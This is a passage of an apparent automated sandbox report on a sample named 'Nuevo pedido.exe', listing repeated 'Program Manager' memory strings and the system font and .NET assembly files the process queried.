                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4wp
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qlgC
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q .Y
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0r*
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qLH#
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL&>
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4XG
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(?X
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|$;
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qx~Z
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qX`&
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qX>A
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpC-
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXu6
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0"i
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qhR
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$,9
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd+*
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<:l
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4n'
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDL4
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@eN
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\:I
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,=8
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt*%
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDKk
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|[0
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,<L
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qpcK
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0do
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4*q
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@e?
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$M`
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt*S
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qH5!
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@f:
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\^#
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|}C
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q %5
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qx2`
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qt+?
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qtlD
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q&a
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qTnA
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8VD
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8vb
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(vr
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qhm
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qhTA
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDnG
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q||W
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qhv&
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4*/
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|Y;
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4jk
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qTJ*
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|{
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@B2
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\9@
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q(t;
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHe
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,:W
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`b-
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP Q
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|XO
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8RZ
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\8T
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTHcq0
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@cY
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qD:
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,;C
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qhrj
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL}#
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q "T
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qp@q
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qh2.
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qL{\
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^ql<
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP!=
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qx/b
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qdIS
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q E%
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q4KV
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q #@
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qH1e
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@e
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q|Xt
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qdJ?
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qH7D
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q I=
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qHWb
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q\`F
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qdW
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qtp@
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qTOG
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q40'
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,a@
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qToe
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qPha
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q@hq
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qXz)
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q0'\
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qhw]
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^ql?#
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qDr1
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qd:
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q<A&
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$1,
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$QJ
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qdOA
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q$qh
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`'
                  Source: QGVhHsAOjb.exe, 0000000E.00000002.4139020544.00000000033D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qdOD
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qP&o
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.00000000031B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qdp
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,B+
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qTPP
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q,bI
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qhyR
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qX6m
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q`Gl
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^qdOp
                  Source: Nuevo pedido.exe, 00000009.00000002.4139670992.0000000003279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q8Z.
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Users\user\Desktop\Nuevo pedido.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
